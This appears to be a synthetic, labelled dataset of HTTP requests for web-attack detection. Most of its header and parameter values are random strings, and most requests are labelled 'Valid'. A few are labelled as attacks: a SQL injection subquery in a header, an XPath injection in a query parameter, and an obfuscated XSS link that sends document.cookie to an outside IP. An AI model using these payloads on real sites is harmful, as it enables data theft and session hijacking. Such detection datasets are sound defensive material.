If-Match: *
If-None-Match: "k5b9lTzcnXotRmfI"
If-Range: Mon, 05 Jan 09 19:11:23 CET
Max-Forwards: 6
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bmlHR3BwOm9XbW1NZ28=
Authorization: te1odf tiidr=H26tf
Range: 27601-82680,576792-311040,-975285
Referer: /hitv/me4eaq/c23d1.mp3
TE: deflate,gzip
Trailer: Accept-Charset
User-Agent: lm4aswrre/7.1.5
UA-CPU: x86
UA-Disp: 497,2476,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 420x8395
Via: 3.2 www.8wuny.jpg
Transfer-Encoding: shyeea; vbtg=jodphNyr
Upgrade: btCas3/7.1
Warning: 037 www.hherAoqh.shtml "Nsboaotl5osqnnpngxrn" "Fri, 28 Aug 09 18:01:13 GMT"
X-Forwarded-For: 102.210.121.17
X-Serial-Number: 8267769973
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vb9Kr_d=67&3easNseoloseore=stmpM&orfhsia=eg&ia3=sePewExx3acEenh&driosranebrSlde=vb &0hueiehh=38568&a9nsooIcDei52au=59590&RHga46HHh=itqyso:O tR&oVnyeenvle=itnbwzhe&mochahtpassuudhLf=tn

End - Id: 34728
Start - Id: 11302
class: Valid
GET /evBPp3Ywz/styyicTeran0gbbe/t@HX@jzyp3n2-QD-Yl@-/neswnnyee6d/aaslrn4piop.mdb?jilmhr=ta2hzn+phrnaqen&dg1=+in HTTP/1.1
Host: 109.245.179.147
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: snteial-n7vwh;q=0.9, os5ad-sa;q=0.4, eco-aahi1ijy, b9sirAfu-p0bg, owrhortx-9nq;q=0.8
Cache-Control: min-fresh=7
Client-ip: 11.225.59.139
Cookie: ysri=da';tl8door=es\Eafo3dojec|yzlocation;t1snEpwnr=nhahmoe0dotTn;nm5r4d4ynnoZnn=udedeocLysuao;loiedcaugh=1;eezl=0a
Cookie2: $Version="547"
Date: Mon, 26 Oct 09 07:01:42 UTC
ETag: W/"Q70-SUILFtkAP0xZBTKb"
Expect: 7wietR
From: gTuate@tleftytat.ch
If-Modified-Since: Sat, 17 Apr 10 24:03:58 UTC
If-Unmodified-Since: Mon, 17 Sep 07 12:18:25 CET
If-Match: "P.TTvoHv_RaMZ0HbG"
If-None-Match: *
If-Range: *
Max-Forwards: 611
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic MGt5bGk6d2h0c0N1aWI=
Authorization: NTLM ZG90a2dzdTNQZGV0b3Jkd3JpZWllOHN0a2RvaHREM2V0c1E=
Range: -804989,80228-817083,634510-68597
Referer: /2eueCLD/1haeOqo/odoIi.pdf
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/8.2 (Machintosh; U; PPC Mac OS X 3.0; vh-fs; rv:8.4.7) Gecko/23474269
UA-CPU: Sparc
UA-Disp: 144,3420,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2840x080
Via: FTP/4.3 www.mlIh.jpg:7488
Transfer-Encoding: deflate
Upgrade: iaan/9.5, nEc8/6.5, dtieO/7.0, is5/4.9
Warning: 175 www.nAlNiR.png "m3SZt1ats4" 
X-Forwarded-For: 203.140.233.72
X-Serial-Number: 7492268797432274
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11302
Start - Id: 7343
class: Valid
POST /lc.moaTChI/iwinnt8tHGm.js? HTTP/1.0
Content-Length: 91
Content-Language: to,0,shnkpg
Content-Encoding: identity
Content-Location: /inyliz7/uotsranq/aboioi/cnedii/dath.cgi
Content-MD5: ZW5zOXRhNnVodWdCbkl3bw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Jun 04 17:27:22 UTC
Last-Modified: Sun, 11 Nov 07 12:14:32 CET
Host: www.teenn.net
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i, cp-932
Accept-Encoding: 
Accept-Language: e-T3giYuuw;q=0.8, LeCt-esidrnoc;q=0.8
Cache-Control: max-age=128
Client-ip: 18.53.58.226
Cookie: 9oteao2uI0g=481661;8aeost=410277;@wFt=7;ianenrm=tgdSl2hs;eirhthea9=ns;mEFr5R44Qprocessing-instructionQ=FqaeCud
Cookie2: $Version="452"
Date: Tue, 06 Nov 07 06:12:09 GMT
ETag: W/"Q-Vu8CxN8jsJFGiq@"
Expect: 100-continue
From: paelsta@Bijzxj.uk
If-Modified-Since: Tue, 05 Feb 08 19:59:05 UTC
If-Unmodified-Since: Mon, 04 Oct 04 22:51:18 CET
If-Match: "4nEKueTDZ_.p5b8Ey.LQ"
If-None-Match: "u6Y-t9pZZs@nsQlP"
If-Range: "UgIV.ctD1EbgQOOfl"
Max-Forwards: 9149
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: r5it7 xtlcz=Plhl65g5
Authorization: osed sv0i=yn4sm
Range: 0730-,-46
Referer: http://www.EeE6nea.biz/awwrTi/ornfef8m/sebst/yr8freR.txt
TE: trailers,gzip;q=0.3
Trailer: Expect
User-Agent: nUkNz9 http://www.Nesasi.uk
UA-CPU: x86
UA-Disp: 457,861,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1302x7380
Via: HTTP/2.5 www.wfteI2du.gif, 5.7 53.236.19.212, HTTP/7.8 www.iOzabc.shtml
Transfer-Encoding: compress
Upgrade: 5a1o/5.9, umu/3.5
Warning: 655 100.141.12.117 "hcbd8ehsccIiFlye" 
X-Forwarded-For: 181.117.178.72
X-Serial-Number: 33978029627174385263
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

nnnamn=;6x3ps&sdtns4='ll3r&wghaooexnsnf3=2839&dsg=71549&arigsi1sede=97&rS1t._h2nc=phec2

End - Id: 7343
Start - Id: 31251
class: Valid
GET /c2JnlxCY/xp_Evtxterm/0B/eE@HhH6utOs8UG/hmWQw177Ufde/jOafsiqesnnhd/4nrIn5cIhnr5/5nNkE0nzv39yqqI6/nhzeww8cReujanolBcoo/eDnCjdclocationformchildphpqUi/7vnGtett/4LkatqG8iom.pl? HTTP/1.1
Host: 159.180.153.140
Connection: keep-alive
Accept: application/zip;q=0.9, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: treh8u-n5e;q=0.5, nerrew1-s;q=0.5, Xareb-is, e-keh;q=0.5
Cache-Control: eq4l='v'
Client-ip: 136.220.24.18
Cookie: m9Jo=ke;Myk4f5F9VW=tLijaeEPaxlthcea;Hwbgpeloz=a+3;5owa8=7025349;rkte=1
Cookie2: $Version="86"
Date: Thu, 08 Dec 05 04:49:44 GMT
ETag: W/"F9SvO6rqqv0-GZP"
Expect: 100-continue
From: ettihl@s2tpbthdps.com
If-Modified-Since: Sat, 26 Dec 09 04:03:09 CET
If-Unmodified-Since: Sun, 30 Jan 05 09:06:41 UTC
If-Match: *
If-None-Match: "xNUfNUGLM2pU1jqtA@"
If-Range: "6am13tziAX5yo.1N"
Max-Forwards: 1080
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic bHJzVGpuYTpybW9qZWg=
Authorization: mchat ddboriUe=nwrit
Range: 019-,893-4434
Referer: http://HSmesnc.fr/eoEtdie/ot5wcaa/hylo/4IiugMtd/asIse.css
TE: chunked,gzip;q=0.9,trailers
Trailer: From
User-Agent: s5Rgaresxcat
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3795x126
Via: 7.5 250.142.136.68:648
Transfer-Encoding: deflate
Upgrade: saowt/0.0, sfnh/5.8, toer/0.8
Warning: 056 38.22.201.145 "0caoiey" 
X-Forwarded-For: 154.121.5.105
X-Serial-Number: 65900782326
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31251
Start - Id: 41232
class: SqlInjection
GET /hgtrhaef7No0lt3io/nKo-UB@/aeeeohncne/a9u8_EYL3AeXINHe/hqygeisob/EQtnh6yUlTliseeJw/pF5rkt8ihO3rrpoee.html?AwtVOiR9l=r%7E&PKPqA6HnR=affU4 HTTP/1.1
Host: 162.252.4.136:80
Connection: close
Accept: */*
Accept-Charset: windows-874;q=0.2, windows-1251
Accept-Encoding: '     +  (   SELECT    TOP   1    emEtt FROM 8ejuDeu)  + '
Accept-Language: *
Cache-Control: min-fresh=243
Client-ip: 60.161.90.58
Cookie: Ths2srZegbi3=ht;yauiswntfil=a-LJ3DzA2l;afLqan1=bRWH8VYm;o6WynI_0x@M=ldseseataf9ow
Cookie2: $Version="15"
Date: Fri, 25 Jan 08 02:03:46 GMT
ETag: W/"XdV3nJlt1c6y2G4"
Expect: 20shirg=aNlhi4Re
From: hsk6aaig@oo1it1ta.gov
If-Modified-Since: Wed, 16 Jun 04 06:01:05 UTC
If-Unmodified-Since: Mon, 19 Jul 04 23:37:05 UTC
If-Match: *
If-None-Match: *
If-Range: "BZ49Q14SD3s1UOEn7"
Max-Forwards: 7
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Basic Yzloa21oajg6aHRMcg==
Authorization: NTLM N0ZlM3NlcW50MWVleWl5ZWxhc2VsbWVtc3RvcnNzZGVzYVRudG5tM2xJc0Z0YXQ=
Range: 710465-
Referer: /cuneIds/reeztRR/itgrdaRh/uae9tSTt.asp
TE: chunked,deflate
Trailer: Accept-Encoding
User-Agent: tetC (swM0RxT; i@AZyrgxx; ns8p_d)
UA-CPU: MIPS
UA-Disp: 940,2353,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 598x7537
Via: 0.8 102.77.184.105, 8htsi/5.2 www.ohvlt.css:2976, FTP/6.9 171.67.230.48
Transfer-Encoding: identity
Upgrade: e6be/2.5
X-Forwarded-For: 53.10.114.237
X-Serial-Number: 028293
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41232
Start - Id: 13271
class: Valid
GET /iframehtaccesn%umaQD_H/LX6y2lmfuj7/u3updateNXiDpositionB1BVP.css?sNjorldi2=963&sohniMy=do_&y-rXn5home9qjHs=n&Ortraahtr=%25o%29iw9%3DArmhesecopybla93&mi=aefostbsEn&9la=%27n%2B&Aba=ln&Rpio=61&ewemseza3e8ks=cat%2Fsf HTTP/1.1
Host: 21.173.17.79
Connection: keep-alive
Accept: image/*;q=0.1
Accept-Charset: euc-tw, iso-2022-kr;q=0.4, euc-kr, x-mac-arabic, ks_c_5601-1987;q=0.6
Accept-Encoding: *
Accept-Language: hl-akejnclw, tmiso-ees, 6h4g-tvultqe;q=0.2
Cache-Control: only-if-cached
Client-ip: 151.62.227.194
Cookie: Lm7ecg=emon@;hlehEe6er=Do$:
Cookie2: $Version="23"
Date: Mon, 07 Jul 08 06:19:57 CET
ETag: W/"_U7Dq7FF1JXRYJzpS3j"
Expect: oxIda=eu5R9Na;ypalmfe
From: ag2teao@l2Dusietlt.org
If-Modified-Since: Fri, 23 Oct 09 16:11:07 GMT
If-Unmodified-Since: Tue, 08 Jul 08 01:30:05 UTC
If-Match: *
If-None-Match: "pCMpUulJLjQyNQWxJpeC"
If-Range: Wed, 05 Jan 05 10:40:15 GMT
Max-Forwards: 7341
MIME-Version: 0.5
Pragma: ol2=e3ananhu
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest opaque="Nshamds"
Range: 219-
Referer: http://eboercle.gov/males.pl
TE: trailers,deflate;q=0.9,gzip;q=0.1
Trailer: Transfer-Encoding
User-Agent: a9nzTcbasEleyzi
UA-CPU: MIPS
UA-Disp: 3770,9157,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 2344x540
Via: 9.5 www.lseAwpe.htm:0
Transfer-Encoding: compress
Upgrade: wR3/7.6, otia/4.2, tdnt3/1.1, nttir/7.7, l7tde/6.2
Warning: 764 www.Zhr1sd.htm "u9u0" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 9425321413781535
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 13271
Start - Id: 8063
class: Valid
GET /KyzJAdocumentlikeetcTQsnodeW.htm?nwsnTHiun9=eum%40lfQLqO-t&V84=c7vl&mbiluh=im%3F%5B&lhcqMaem=%7C8s%5Dentono%276%2Brt%2F&x8rnoacoesH5x=8196&cys=M3lst&ma87noNtnioo2=ntxef&dQaie=60971 HTTP/1.1
Host: 188.20.57.6
Connection: e1Ws1ih
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.5
Cache-Control: min-fresh=7
Cookie: srhnsuq5r=344504
Date: Sat, 20 Mar 04 02:32:29 GMT
ETag: W/"iwnUG5-8F@O7XXv_5xc"
Expect: 100-continue
If-Modified-Since: Fri, 21 Mar 08 11:28:33 CET
If-Unmodified-Since: Sat, 22 Dec 07 15:29:21 CET
If-Match: "FEnb6j6mr.wqE9bmBo4O"
If-Range: Tue, 30 Mar 04 15:29:31 GMT
Max-Forwards: 461
MIME-Version: 4.3
Pragma: e1p='aWe'
Proxy-Authorization: YsN39r adouz=1z3nk
Authorization: Digest realm
Range: -7887,3458-,5341-
Referer: http://www.l3xteeu.de/entsjE/ryzdt.asp
Trailer: If-Match
User-Agent: Mozilla/6.0 (Windows; U; Win 9x 7.4; wy-lo; rv:5.9.5) Gecko/06309928
UA-Color: color32
Via: qu7n/8.1 30.124.130.15, 9.8 www.koetm0.js, 8.8 www.yeht1s.tiff
Transfer-Encoding: eyha1
Upgrade: E8t/1.5, bnr/0.9, lvct/2.3, 09uusr/6.3, mesee/9.5
Warning: 083 www.ol6ion.tiff "m4ueyeoe" 
X-Forwarded-For: 247.192.186.78
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8063
Start - Id: 31459
class: Valid
GET /vneor1e/Aidsi/e3oE@Jnq.yEk6rQr/vts/ivjgKCA.jsp?rgaOresygneskt=ieOtooT HTTP/1.0
Host: www.8crfurEemu.com:395
Connection: close
Accept: */*;q=0.4
Accept-Charset: utf-7;q=0.8, x-mac-arabic, iso-8859-15, windows-1250, utf-8
Accept-Encoding: *
Accept-Language: ecr-nh1ran0h;q=0.2, 1s-aleeHe00;q=0.2, gn4b-eMn0iejc;q=0.7, n8gdh-st, chs-nw
Cache-Control: no-store
Client-ip: 117.25.5.120
Cookie: oeheeaneEu=t2bh;inputFafrFHr=\jl
Cookie2: $Version="82"
Date: Thu, 18 Dec 08 10:11:37 GMT
ETag: "4fKlTwFk6MDrkfdK0"
Expect: 100-continue
From: s4eeitia@i1hb.cz
If-Modified-Since: Fri, 11 Feb 05 19:52:17 CET
If-Unmodified-Since: Thu, 27 Mar 08 11:45:53 GMT
If-Match: *
If-None-Match: *
If-Range: "4yI6bBJ_kRZP4UdnGE"
Max-Forwards: 4852
MIME-Version: 2.0
Pragma: i5=r
Proxy-Authorization: Basic VHJhcm1ueGE6bmRlZDZsM3U=
Authorization: sGtenL aIphsla=rrkreGh5
Range: 395-,82784-
Referer: http://www.swl4.de/Nuneoe/oaepw.swf
TE: trailers,deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.5 (Machintosh; U; PPC 1.0; zL-nw; rv:7.6.2) Gecko/95019102
UA-CPU: Sparc
UA-Disp: 7523,3452,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 389x351
Via: HTTP/4.8 www.dDeen.html:3000, 4.6 90.175.201.188
Transfer-Encoding: identity
Upgrade: mln/7.2, NAfn0/9.1, dmeaiu/6.1, ar3te/8.1, mUiso/1.2
Warning: 765 24.36.202.0 "ajeMEawyotisp" 
X-Forwarded-For: 187.213.56.17
X-Serial-Number: 1337403720563308
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31459
Start - Id: 8294
class: Valid
GET /4pvYN_O/tiprWretyesr2rao9htn/82UsHLWsMXwekq/HnodeVLMzK4xp_/pntIr4T1aO.nsf?o2t=ew-nuCKh&dttIt=sQJi_&jgwEbteuueQ=ehopwinntr&rdepudzan98e=e&0X7httpscatQRJXv=ngeece7ta+5edYn&lsw=79120&oce8athlt=c4PAM.ppiW&duiIau=xt8asX7Npdtlntue&l9tghbHUnnen9=ezQ1a&n4itrrsfztcsona=doee HTTP/1.1
Host: www.daputNsnr.org:80
Connection: close
Accept: video/*;q=0.1, video/*;q=0.8, video/mpeg
Accept-Charset: windows-1251, x-mac-roman
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.8
Cache-Control: min-fresh=825
Client-ip: 147.46.202.197
Cookie: twas4Newster3=5076;b3etbgqnsir7=vbscriptar;swPuyiesmdnni=5022529
Cookie2: $Version="01"
Date: Sat, 11 Sep 04 08:01:06 CET
ETag: "SF6ntt3pM9U3EuHN@Oj"
Expect: 100-continue
From: epaiNa@tesaenml.net
If-Modified-Since: Mon, 15 May 06 04:05:03 UTC
If-Unmodified-Since: Sat, 24 Jun 06 20:03:57 UTC
If-Match: "CDI9VW5FDpUnj4IFsg."
If-None-Match: *
If-Range: *
Max-Forwards: 0195
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVnb2ZoYXNMcHNlT2VwZm5hY2VFZHRoYTNVcmVnaHNTZWFsam90YWxkUmNy
Authorization: Digest nonce
Range: 9-,-1,846-
Referer: http://www.FtDtta.uk/rc5yt/dnkT/deaen/ahat/eiettwn.dll
TE: trailers,gzip
Trailer: Range
User-Agent: Mozilla/7.1 (Machintosh; U; PPC 9.0; te-Ef; rv:6.6.5) Gecko/83304785
UA-CPU: x86
UA-Disp: 9881,382,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 138x587
Via: 4.8 www.oeleersg.htm
Transfer-Encoding: omit
Upgrade: n83/8.7, wpeioz/2.0, Rbtic5/8.3, s4h/9.8
Warning: 166 128.16.194.221 "tetd7downhmnsrzsiWo" 
X-Forwarded-For: 9.228.133.238
X-Serial-Number: 538548
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8294
Start - Id: 15563
class: Valid
GET /eNFuwmyLZr2-ElV6vKX.htm?smwslrf=mnat HTTP/1.1
Host: 97.117.224.158
Connection: keep-alive
Accept: application/*;q=0.2
Accept-Charset: windows-1257, x-mac-greek;q=0.5, windows-1251, windows-1257, koi8-r;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: min-fresh=26
Client-ip: 204.149.225.70
Cookie: epegtspeBton=5582116;datdla1d=dAiZepTmlD;8bht=31;orua7ae0tSElaoT=yNL_Ee
Cookie2: $Version="35"
Date: Fri, 24 Jul 09 14:19:52 UTC
ETag: W/"AkSv8ZhlgvomIP1qWdHO"
Expect: oonrsgi
From: Ftobr@eibao.net
If-Modified-Since: Sun, 08 Aug 04 07:48:55 CET
If-Unmodified-Since: Wed, 14 Apr 10 08:16:23 CET
If-Match: "F6r8ZL0utlH8@w_kl"
If-None-Match: "djzlEz5K0G62nAOUMjA"
If-Range: Wed, 06 May 09 16:12:04 GMT
Max-Forwards: 0
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic dGVoN246dGxoZW9lcU8=
Authorization: Digest nc=Dd3171F3
Range: 22-,-4187
Referer: /mfUebeuO/ogtniv1d/avh1siR/swtsce.php4
TE: deflate,trailers,trailers
Trailer: Cache-Control
User-Agent: 8eayouidn (1DPNyaoV_r; eX7Vog4T; h-tqw_)
UA-CPU: x86
UA-Disp: 213,6888,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 817x4367
Via: 8.1 107.214.41.228
Transfer-Encoding: deflate
Upgrade: aeaae/1.2, oeh0/9.9, asctrd/8.3
Warning: 169 27.250.209.229 "tee9rk" 
X-Forwarded-For: 234.88.187.100
X-Serial-Number: 4557726217620382027
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15563
Start - Id: 49829
class: XPathInjection
GET /qGbl..rcpi/dgV8DCQz4NUl48Tt/het/iyX9lcbLcvtODF3X/e1Srp2o79O2/oJT/ha0wnf/oxrV5YZ1/h-JWNVGKVdsMzkF.sh?vnUk.OI_=tA%27+++or+6++++%3C+++count%28path%2Fchild%3A%3A*%29+or+%27ipmeymmc%27%3D++++%27&nsht4anymhvsqe=nKBSW&6tcnral4hndtoje=19&owoWh3deax=hzn%25fino%5Ds&unscreet=eiuTLwaeinput&lestsse=mLwhere+&eirispu=ebin&rFrineiches=Nnhttsap+at6&athho4k4S=mZBfZLWDU&Edwctn3hn=2877&em=0&sqi2e=030508 HTTP/1.1
Host: www.iriars9rh.org
Connection: close
Accept: */*
Accept-Charset: euc-kr;q=0.0, iso-2022-kr;q=0.2, ks_c_5601-1987
Accept-Encoding: compress;q=0.5, deflate;q=0.9
Accept-Language: *
Cache-Control: rcq0jn=r
Client-ip: 77.69.248.51
Cookie: 0sibelidrr=A8;3sittzGIYVx=ossen;btleRisinclibg=32
Cookie2: $Version="7"
Date: Mon, 22 Mar 10 03:55:36 UTC
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: 100-continue
From: noamdhg@Dea3h8.biz
If-Modified-Since: Sun, 07 May 06 05:36:09 CET
If-Unmodified-Since: Sat, 23 Oct 04 10:59:50 CET
If-Match: "@VYXx_B.ty2TE6KS"
If-None-Match: "oaGOmk42r0VfPgn5P9kZ"
If-Range: Tue, 13 Apr 10 07:25:47 GMT
Max-Forwards: 7
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Basic bW5yb25uNzplT2VkdGg=
Range: -29302
Referer: http://www.RaTioh.com/nnzrooo/9vpo9z.msf
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/3.2 (compatible; MSIE 9.2; WinNT; hstuhamlq; mdneL; oedo)
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 172x6984
Via: FTP/3.0 www.ejueitte.shtml, 1.0 1.102.213.43, FTP/6.8 101.207.222.2
Transfer-Encoding: coalqt; lpietfo=dipdwS
Upgrade: oega/2.1, oaa/9.5, pharkT/6.9, nba/7.2, nha/2.3
Warning: 539 163.222.151.131 "oqahsnbhdol" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49829
Start - Id: 3985
class: Valid
POST /Be/uot1u0qRBng17L/8O5xei/wtte1odt/RmsephoHseushatTe/fk/needonspse/eLbRmumk8es/aemhajinsiRcaG/Affie/nt8t7anoe5faw.css? HTTP/1.1
Content-Length: 142
Content-Language: eieex
Content-Encoding: deflate
Content-Location: http://www.xhEos.biz/6kci.css
Content-MD5: c0duNGNZQzJlZWlrbm5waA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 03 Nov 04 15:27:45 UTC
Last-Modified: Thu, 17 Apr 08 24:55:37 UTC
Host: 219.215.25.203:1459
Connection: fa3nih8o
Accept: application/*;q=0.0, image/png
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 92.132.221.217
Cookie: artrugmiOnd=21954037;qseghe3or=neereC;ee=6;D6layglntlpn0p=u)T8%
Cookie2: $Version="5"
Date: Thu, 02 Dec 04 23:40:30 CET
ETag: W/"QrXhiItfsOf03oPNbr"
Expect: ehypnlv=tatcoeF;ao0us5
From: mdue@xtsaa.biz
If-Modified-Since: Mon, 02 Jul 07 12:54:36 CET
If-Unmodified-Since: Tue, 22 Mar 05 08:24:03 GMT
If-Match: *
If-None-Match: "PYKJhUAeDBWxiSZ11"
If-Range: Mon, 03 May 04 11:26:49 UTC
Max-Forwards: 02
MIME-Version: 6.0
Pragma: Exnni='1n'
Proxy-Authorization: tmnei nc2O72=mjomltai
Authorization: NTLM ZUNhYTB6c3RsZ29oYXV0a2V3bWdyZXJpbnhjZU1sNW9lb2VhZG9oazNucg==
Range: -8434,3699-,50553-
Referer: http://acorn.gov/e71bRit/meRhm.pdf
TE: chunked;q=0.3,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.0 (compatible; MSIE 6.4; Open BSD i386; noos9atNew; auqrheu)
UA-CPU: MIPS
UA-Disp: 4256,175,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 881x617
Via: 1.3 26.111.159.43
Transfer-Encoding: e4qeih
Upgrade: oefTul/8.6, 0Euin/6.0, n5h/9.8, ghe/7.4, n3n48/3.1
Warning: 761 32.233.129.177:90099 "ciesoeid" 
X-Forwarded-For: 189.95.227.203
X-Serial-Number: 40666
----: --------------------
~~~~~: ~~~~~~~~~~~~

tyrR0=msa8aeposition>k&9aebin3cryt=04&7jor4n=rwy$is&coicmeEi0e=3378994&lwo1dseb=Ieo12o@n&rg=782bv.eD&TwY2A-TEPrR=jhbodyPk0a&omseachs=ea9

End - Id: 3985
Start - Id: 17873
class: Valid
GET /n2fxito0u/rt55udhrh5/aehfC2VcSQN@MWlllqT/wcsitOees6tm/siprhar3srtAncpaS0id/lO/dseyrakhbpcYnlnsp/vW6Q61kNv@NiWE6/unionit9inputmailu8p0aO-includeRK.mdb?fahmr3c=nXCnhAOK3N&ss0nentlsjar=t+%2Bt-&HmTstdindSTnbPkT=erflJ0%7Can%273nre3aSu&bosps6migreeret=3447&7Bj0dGPnbgsound=qmai6&SfitOjnO=9790752&kirA4ZMtmp6exec=88654&0lea52eyztd8E=OrZ&trw9meboV8ekyo=drrcnps%3DoNl9p+i HTTP/1.1
Host: 65.133.175.46:80
Connection: keep-alive
Accept: application/*;q=0.9, text/xml;q=0.9, image/*
Accept-Charset: windows-1255;q=0.3, macintosh;q=0.2, cp-936, utf-8, x-mac-arabic
Accept-Encoding: *
Accept-Language: *
Cache-Control: o2aco=yyvtNS
Client-ip: 78.14.160.119
Cookie: 8B2pQS9=thlui;maslzhaoic=430352;w3osm6snmdheOK=62989;sUiariicen2f=iscaoka0nullrma;2is9=yr%;uiu=2853668
Cookie2: $Version="47"
Date: Tue, 08 Aug 06 14:19:54 GMT
ETag: "uXPXcexxgKdrDYnufxs"
Expect: anaiO
From: sd5ne@iqufsnt5.org
If-Modified-Since: Tue, 18 Jul 06 16:45:41 GMT
If-Unmodified-Since: Wed, 11 Jan 06 21:06:49 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 03 Dec 06 03:09:01 UTC
Max-Forwards: 601
MIME-Version: 8.8
Pragma: ovlgltgn=o2ril
Proxy-Authorization: NTLM aWd1bXRkZWR2eW5hc3ptdG5odHVaUmhoczJBbGR0ZGxF
Authorization: Basic OXlzMGRjOmFuYW9laWU=
Range: -321024,-932066,827-
Referer: http://www.n1csh.com/fxyRqD5/reor.wmn
TE: gzip;q=0.7,gzip;q=0.3
Trailer: If-Match
User-Agent: rhEossryfe (hSe0cwK; hJbfNXILAk; gppiB3a; 2Lb.ZRp4s; yFFPNEtwy)
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8176x316
Via: tme/6.0 www.AAmysieh.shtml, HTTP/2.5 98.128.199.64, nrx/2.6 51.192.192.211
Transfer-Encoding: oMc45t
Upgrade: stQa7u/4.6, e3t4e/1.7, los0Y/9.6, le6ear/5.3, irt/9.2
Warning: 182 45.71.47.57 "htrzocTenleelhEw" "Wed, 18 Oct 06 09:52:04 GMT"
X-Forwarded-For: 233.30.107.188
X-Serial-Number: 3494344
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17873
Start - Id: 47275
class: XSS
GET /1i9KtgSc/ymqgl2eteiem5btHhm.cfm?access_logTRAWXAZB=%3Ca++++href+++%3D+++%22+++++javas%26%2399%3Bript%26%2335%3B%5Bwindow.open%28%27http%3A%2F%2F222.10.146.250%2Fon.asmx%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&rA1odhrndsosa=5 HTTP/1.1
Host: www.treOavsao.de
Connection: aowy
Accept: application/zip;q=0.7
Accept-Charset: windows-1253, x-mac-cyrillic
Accept-Encoding: identity;q=0.1, deflate;q=0.9, deflate
Accept-Language: *;q=0.9
Cache-Control: max-age=612
Client-ip: 48.5.47.91
Cookie: hjesnneac6=965106;is=7669071717;ihitD2zeaoyf7ea=uln?;sr=uShe2ttHNseso;5HfeoiEmdumpn1e=84
Cookie2: $Version="73"
Date: Tue, 05 Aug 08 05:46:23 CET
ETag: W/"Ufd2bZimO@p87fbplQ"
Expect: eplnt
From: eA3ce@Sdytnl.st
If-Modified-Since: Sat, 28 May 05 13:29:17 CET
If-Unmodified-Since: Thu, 27 Mar 08 04:46:03 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Mar 08 15:09:09 UTC
Max-Forwards: 98
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM YWFmOHNyYThLaGRuZGhpbTRlRWVybmU5bnJGNWFveGNwbDli
Authorization: NTLM aXBwZWFlb2VoZHRldWlhYWFyYWltbm9vZDNkb2UxZXNjc2VkMm9lNHQ=
Range: 3-25949,-0524
Referer: /spRwki.pl
TE: trailers,deflate;q=0.7,chunked;q=0.0
Trailer: Trailer
User-Agent: Mozilla/8.3 (X11; U; Solaris 2.6; se-eH; rv:3.0.7) Gecko/78934267
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 451x654
Via: 9.5 216.91.65.162
Transfer-Encoding: deflate
Upgrade: do2f/2.6
